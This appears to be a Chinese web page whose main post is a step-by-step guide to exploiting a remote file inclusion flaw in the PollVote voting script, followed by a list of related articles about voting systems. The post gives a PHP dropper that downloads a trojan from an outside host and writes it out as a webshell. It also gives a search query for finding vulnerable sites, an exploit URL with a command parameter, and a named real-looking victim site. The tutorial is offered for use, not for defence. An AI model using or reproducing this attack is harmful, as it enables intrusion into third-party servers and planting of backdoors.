PollVote投票系统漏洞利用

PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,

不过作者说利用过程的时候很烦琐,关键的时候又没说明白,

简单的说一下``

首先建立2个文本 分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?

$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");

$ff=fopen("111.php","a");

fwrite ($ff,$f);

fclose($ff);

?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com 搜索关键词"pollvote.php?pollname"

有很多,

搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了,

刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt

这样

phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php

(0)

相关推荐

  • 基于Jquery与WebMethod投票功能实现代码

    基于Jquery与WebMethod投票功能实现代码

    1:功能描述 1)最好是若干个星星组成,用户投票时候只要鼠标点击星星就可以实现投票,可以自定义星星个数 2)未投票.投票中.完成投票,星星的样式不同 3)每个星星的都可以自定义提示 比如 "差" "一般" "还好" "不错" 4)完成投票后,动画展示投票结果并且不可再投票 2:思路描述 1.3)使用循环,最大值是星星的个数,每次循环添加一条<a></a>的语句,这条超链接通过Class指定星星样式,通过

  • php投票系统之增加与删除投票(管理员篇)

    php投票系统之增加与删除投票(管理员篇)

    关于投票系统怎么样怎么样的引言就不多说,这不是毕业设计,主要说一下使用php实现投票系统,与其他普通系统一样,分为两部分,一个是管理员部分,一个是普通用户部分. 关于投票系统的管理部分,非常之简单,提供两部分的功能,增加投票与删除投票 关键在于设计好数据库的表,拟定于这样存一个投票,voteparent表存这个投票的标题.描述是否被删除,votechildren表存这个投票的子选项与投票数 一.基本目标 首先投票系统是这样的: 三个链接,点进去能够直接进行相关功能的操作,本文主写管理员部分,普通

  • PHP投票系统防刷票判断流程分析

    PHP投票系统防刷票判断流程分析

    近期,我做了一个娱乐门户的投票系统,也是被刷票搞的焦头烂额,一切可用的方法都用了.但都不是太理想,最终,琢磨出来了下面的方法,我做成了流程图与大家分享.看不懂流程的也不要钻牛角了,本人也不做太多无聊的解释,当然,这个流程只是一个大体的过程,中间还有很多的判断,主要运用的还是session.因为什么验证码什么的,那你别用在互联网投票系统中来吧,没有人去验证,一看就烦了.还是那句话,我的WEB开发笔记中写的全是一些简单的思想性的东西,如果想完善,可以自己扩展.本人没有时间解释.以下的流程图中,一定要

  • 一个简单的PHP投票程序源码

    分析:  我们利用一个文件(data.dat)来存储投票栏目.每个栏目占据一行.  这样一来,便可随意加入和减去想要投票的栏目.  我们再利用一个文件(votes.dat)来存储我们的投票结果.  并纪录最近一位投票者的IP地址,简单的防止一人多投.  所以,您应该在该程序目录下自行建立两个文件data.dat和votes.dat  程序运行过程部分  程序运行时应该先有一个投票的HTML表单,等待投票.  当有人在HTML表单上投票时,判断它的IP是否为最近一位投票者的IP,  如果此人刚刚投

  • 用ajax实现的自动投票的代码

    一朋友委托我帮他投票,地址在: http://publish.sina.com.cn/04/13/413/search.php 投票的链接是: http://publish.sina.com.cn/poll.php?p_id=413&t_id=119 我于是做了下面一段代码,做成任务管理器,每隔1分钟打开一次,再自动关闭窗口,但实际运行下来,却无效果,不知问题出在哪里? 复制代码 代码如下: <html> <script language="javascript&quo

  • 简易的投票系统以及js刷票思路和方法

    简易的投票系统以及js刷票思路和方法

    早就听说有什么刷票脚本,微博投票等等相关的投票都有某些人去刷票. 试一下吧,兴许自己也会刷票呢?捣鼓了几个小时,终于有所眉目. (1)投票系统 要刷票,就得先有个投票界面. 当然,可以直接去各个投票网站就行,不过这里还是自己弄个投票页面,方便自己. 页面大致如下 或者 查看演示 照理,界面很简洁,但也基本有了投票的基本功能. 原始规则是:只能投一次票,然后提示成功,然后按钮不可用. 都是原生JS,DOM操作不灵活的可以借此练练手.当然,用jq将会很便捷. html/css部分 <!DOCTYPE

  • 使用js写的一个简易的投票

    大家直接自己看吧,请多多指教,这个是几个月前写的,现在全部整理一下. 复制代码 代码如下: <!doctype html> <html> <head> <meta charset="utf-8" > <title></title> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/j

  • PHP+MySQL投票系统的设计和实现分享

    PHP+MySQL投票系统的设计和实现分享

    系统不大,完成这个系统的过程我分了三个步骤 •数据库设计 •系统框架设计 •前端美化 数据库的设计 设计三张表:投票结果统计表(count_voting),投票人记录表(ip_votes),用户表(user) 投票结果统计表用于统计最后的投票记录,我给它弄了4个字段:被投票项的名称(SelectName),被投票项标签名(LabelName)(起到分类的作用),票数(CountVotes). 投票人记录表用于登记投票人的ip(IP),地理位置(Location),投票时间(VoteTime),被

  • PHP+MySQL实现的简单投票系统实例

    本文实例讲述了PHP+MySQL实现的简单投票系统.分享给大家供大家参考,具体如下: <html> <head><title>手机系统调查问卷</title> <style type="text/css"> <!-- span{ width:600px; height:100px; background-color:write; postion:relative; border:1px #cccccc solid; }

  • 基于jQuery的投票系统显示结果插件

    基于jQuery的投票系统显示结果插件

    首先还是来看一下运行效果如图1所示. 该插件使用步骤 一.引入css文件 首先页面引入css样式文件'votecss.css',他是投票结果正常显示必不可少的.具体代码如下所示: <link href="startpic/votecss.css" rel="stylesheet" type="text/css" /> 二.引入jQuery的就是源文件 该插件是以jQuery为基础的所以引入jQuery插件是必须的具体代码如下: <

随机推荐